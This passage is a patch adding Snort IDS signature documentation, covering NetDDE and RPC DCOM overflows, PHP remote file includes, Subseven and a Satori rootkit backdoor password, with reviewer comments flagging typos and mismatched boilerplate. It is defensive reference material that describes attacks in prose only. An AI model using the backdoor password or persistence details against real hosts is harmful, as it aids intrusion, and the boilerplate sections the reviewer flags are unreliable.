+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
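Review bot: the Impact paragraph ("system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code") is the generic CGI template and overstates a cross-site scripting issue; the consequence of XSS via the "email" parameter of address.view.php is script execution in the victim's browser and theft of the session or credentials, which is what the Attack Scenarios paragraph correctly describes. The second paragraph of Detailed Information ("execute system binaries or malicious code") has the same problem. Corrective Action could add output encoding of the parameter as the application-side fix, with the vendor patch as the primary recommendation. Formatting: two blank lines precede "Rule:", the "--" separators after "100000827", after the Affected Systems entry and after the Contributors list lack the blank line used elsewhere, and the file ends with an extra blank line.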
--- /dev/null
+++ b/doc/signatures/393.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+393
+
+--
+
+Summary:
+This event is generated when an ICMP Datagram Conversion Error message is detected on the network with an invalid ICMP code.  ICMP Datagram Conversion Error messages were developed with the introduction of IPv6 to give information about invalid datagram conversions between IPv4 and IPv6.
+
+--
+
+Impact:
+No known attack vectors are known that use ICMP type 31 datagrams.  This is purely an informational message that detects errors on the network.  Only ICMP Codes 0 through 11 have been defined by IANA, ICMP Type 31 datagrams with ICMP Codes other than these values are invalid.
+
+--
+
+Detailed Information:
+ICMP Type 31 was developed to return information about datagram conversion errors between IPv4 and IPv6 as data is converted between them.  
+
+--
+
+Attack Scenarios:
+None known
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Datagram Conversion Error messages.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 31 datagrams should be blocked at the firewall.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
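Review bot: the Summary attributes ICMP Datagram Conversion Error (type 31) to "the introduction of IPv6"; the type was registered for the TP/IX proposal (RFC 1475), one of the IPng candidates, not for IPv6 as deployed, so the history should be checked before this is published. Impact opens with "No known attack vectors are known", which is redundant, and the codes sentence ("Only ICMP Codes 0 through 11 have been defined by IANA, ICMP Type 31 datagrams with ICMP Codes other than these values are invalid") is a comma splice. Since Impact says this is informational and Attack Scenarios is "None known", Corrective Action should explain why a type 31 message with an undefined code is still worth blocking at the firewall (a host that sends one is malfunctioning or crafting packets). Formatting: the "--" after "None known" in Attack Scenarios lacks the preceding blank line, and the file has no "Affected Systems:" section.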
--- /dev/null
+++ b/doc/signatures/2964.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2964
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
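Review bot: the Impact line and the first Corrective Action line lack full stops ("...with system level privileges", "Apply the appropriate vendor supplied patches"). Corrective Action lists "Disable the NetDDE service." after the patch; since Detailed Information already notes the service is not started by default, it would be more useful to say "confirm the service is disabled or not running" so readers do not assume it is on. Detailed Information also says the issue can be exploited locally for privilege escalation; that belongs in False Negatives as well, because local exploitation produces no network traffic for this rule to see.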
--- /dev/null
+++ b/doc/signatures/1622.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1622
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
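Review bot: the Summary ("activity relating to spurious ftp traffic") does not say what the rule matches, and Detailed Information offers two very different possibilities ("transfer of a known protected file" or "overflowing a buffer in the FTP daemon"), so the reader cannot triage the event; state the actual pattern SID 1622 keys on. The file lacks the "Affected Systems:" section used elsewhere. In Corrective Action, "Use secure shell (ssh) to transfer files" should name the actual mechanisms (scp or sftp), and "Disallow access to FTP resources from hosts external to the protected network" does not address the first attack scenario, an internal user sending sensitive data outward, which needs an egress control rather than an ingress one.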
--- /dev/null
+++ b/doc/signatures/3285.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3285
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
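Review bot: the Attack Scenarios text "An attacker may make a request for a file with an overly long filename via a network share." does not match the flaw described under Detailed Information (malformed DCOM requests sent over RPC); it reads as if copied from a different signature and should describe a malformed RPC request instead. Typo in Ease of Attack: "Expoit" should be "Exploit". Additional References is empty for a vulnerability that has a vendor bulletin; cite it.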
--- /dev/null
+++ b/doc/signatures/216.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+216
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "satori". This is a known password for 
+the Satori Linux rootkit.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats
+http://www.whitehats.com/info/IDS516
+
+--
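Review bot: "This Trojan affects Linux operating systems:" under Detailed Information ends with a colon but no list follows; either end the sentence with a period or add the list it introduces. Also fix the double space in "when  an attacker" in the Summary, and add the missing period after "Use SSH as opposed to Telnet for access from external locations" under Corrective Action.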
--- /dev/null
+++ b/doc/signatures/1669.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1669
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
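Review bot: "running ona web server" in Detailed Information should be "running on a web server", and "the attackers choosing" (Impact and Detailed Information) should be "the attacker's choosing". The same CGI boilerplate appears verbatim in 871.txt elsewhere in this patch, so fix both copies, and add a sentence saying what SID 1669 specifically matches so the two documents are not interchangeable. Additional References is empty.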
--- /dev/null
+++ b/doc/signatures/3046.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3046
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
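Review bot: several separator and header lines in this file carry trailing whitespace ("-- ", "Rule: ", "Sid: ", "Summary: ", "Impact: " and others), which differs from the other files in this patch and will trip whitespace checks; strip it. "Apply the appropriate vendor supplied patch" under Corrective Action is missing its period. Additional References is empty even though Detailed Information names a specific Ethereal ACL/ACE parsing flaw in 0.10.7 and prior; add the vendor advisory for it.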
--- /dev/null
+++ b/doc/signatures/1767.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1767
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
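Review bot: trailing whitespace on several Summary, Impact and Detailed Information lines; strip it. "the attackers choosing" in Impact should be "the attacker's choosing". This file is generic boilerplate that also appears as 1381.txt and 1192.txt in this patch; a sentence stating what SID 1767 actually matches would make the document useful to an analyst.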
--- /dev/null
+++ b/doc/signatures/1215.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1215
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
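Review bot: the Affected Systems section is empty; fill it in (Detailed Information implies all systems running a web server) or drop the section. Typo: "running ona web server" should be "running on a web server".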
--- /dev/null
+++ b/doc/signatures/100000328.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000328
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ScozNet ScozNews" application running on a webserver. Access to the file "admin_templates.php" using a remote file being passed as the "main_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "main_path" parameter in the "admin_templates.php" script used by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
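Review bot: the third Detailed Information paragraph and the Attack Scenarios section describe credential-validation weaknesses ("supply his/her own credentials to gain access"), which is unrelated to the remote file include flaw in the "main_path" parameter of "admin_templates.php" described in the Summary; drop or rewrite that boilerplate so the document matches the rule. Also: "an exploitation attempt has been attempted" is redundant (suggest "an exploitation attempt has been made"), "running ona web server" should be "running on a web server", and the two blank lines before "Rule:" should go for consistency with the other files.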
--- /dev/null
+++ b/doc/signatures/400.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+400
+
+--
+
+Summary:
+This event is generated when An ICMP Network Unreachable For Type Of Service datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when the route to the destination network does not support the Type of Service requested in the datagram or the default TOS.  This could be an indication or routing problems or excessive packet loss.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
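Review bot: three wording errors in this file: "when An ICMP Network Unreachable" should be "when an ICMP Network Unreachable", "an indication or routing problems" should be "an indication of routing problems", and "could indication routing problems" should be "could indicate routing problems". The Ease of Attack entry ("Numerous tools and scripts can generate these types of ICMP datagrams.") sits oddly next to Attack Scenarios saying "None Known" and Corrective Action calling the event informational; either describe a scenario or change Ease of Attack to match.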
--- /dev/null
+++ b/doc/signatures/3105.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3105
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
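Review bot: "Microsoft Windows Server 2000" under Affected Systems is not a product name; the product is "Microsoft Windows 2000 Server". There is a stray blank line between "--" and "Corrective Action:", and trailing whitespace on the "-- " separators and the "Rule: ", "Sid: ", "Summary: " headers. Additional References is empty for a vulnerability that has a vendor bulletin; add it.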
--- /dev/null
+++ b/doc/signatures/1438.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1438
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
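Review bot: the Corrective Action section is empty. Since Impact and Detailed Information frame this as a policy issue, suggest something like "Block or restrict the application's traffic at the network perimeter and enforce the corporate acceptable-use policy."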
--- /dev/null
+++ b/doc/signatures/3296.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3296
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
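Review bot: this file is identical to 3285.txt in this patch apart from the SID, including the mismatched Attack Scenarios ("overly long filename via a network share" versus the malformed RPC DCOM request in Detailed Information) and the "Expoit" typo; fix both copies together, and add a sentence stating how SID 3296 differs from SID 3285 so an analyst can tell the two events apart.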
--- /dev/null
+++ b/doc/signatures/103.txt
@@ -0,0 +1,119 @@
+Rule:
+
+--
+Sid:
+103
+
+--
+Summary:
+Subseven22 is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine. Other versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan replicates itself and in most cases, gives the copy 
+a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+Subseven is an improved version of the Netbus Trojan (see sids 114, 
+115), Subseven DEFCON8 2.1 is an improved version of Subseven that 
+affects Windows 95 and 98 implementations.
+
+The Trojan changes system startup files and registry settings to add the
+Subseven sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	103	subseven 22 (incoming TCP connection)
+	107	subseven DEFCON8 2.1 access (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
+	HKEY_LOCAL_MACHINE\Hardware\Data
+	HKEY_LOCAL_MACHINE\Hardware\Enum
+	HKEY_LOCAL_MACHINE\Software\Microsoft\DirectXMedia
+
+Registry keys added are:
+
+	HKEY_CLASSES_ROOT\.dl
+
+Removal of the replicant is also required, look for files ending in 
+".exe" or ".dll" in the <drive>:\Windows\ or <drive>:\Windows\System\ 
+folders that use alphanumeric file names. The name of the replicant may 
+be in one of the registry keys above.
+
+A machine reboot is required to clear the existing process from running 
+in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Hackfix
+http://www.hackfix.org/subseven/
+
+McAfee
+http://vil.mcafee.com/dispVirus.asp?virus_k=10566
+http://vil.nai.com/vil/content/v_10566.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/backdoor.subseven22.html
+
+F-Secure:
+http://www.f-secure.com/v-descs/subseven.shtml
+
+--
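Review bot: the registry paths under Corrective Action are written as "Current Version" with a space; the actual key is "CurrentVersion" (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and ...\RunServices), and an administrator searching for the spaced form will not find it. Typos: "exceutable" should be "executable", "Subseven sever" should be "Subseven server", and "Subseven22" in the Summary should match the "subseven 22" spelling in the SID table. "HKEY_CLASSES_ROOT\.dl" under "Registry keys added" looks truncated; confirm the key name.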
--- /dev/null
+++ b/doc/signatures/100000546.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000546
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Blue Dragon CMS" application running on a 
+webserver. Access to the file "rss_admin.php" using a remote file being passed 
+as the "DragonRootPath" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DragonRootPath" parameter in the "rss_admin.php" script 
+used by the "PHP Blue Dragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Blue Dragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
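Review bot: blank lines are missing before the "--" separators after the Sid, Affected Systems and Contributors sections, unlike the other files in this patch; add them. As in 100000328.txt, the last Detailed Information paragraph and the Attack Scenarios section are credential-checking boilerplate unrelated to the "DragonRootPath" remote file include flaw; rewrite them to match the rule. Typos: "running ona web server" and "an exploitation attempt has been attempted".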
--- /dev/null
+++ b/doc/signatures/1940.txt
@@ -0,0 +1,56 @@
+Rule:
+--
+
+Sid:
+1940
+
+--
+Summary:
+This event is generated when a possible buffer overflow is attempted for the bootpd service.
+
+--
+Impact:
+Remote access. This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
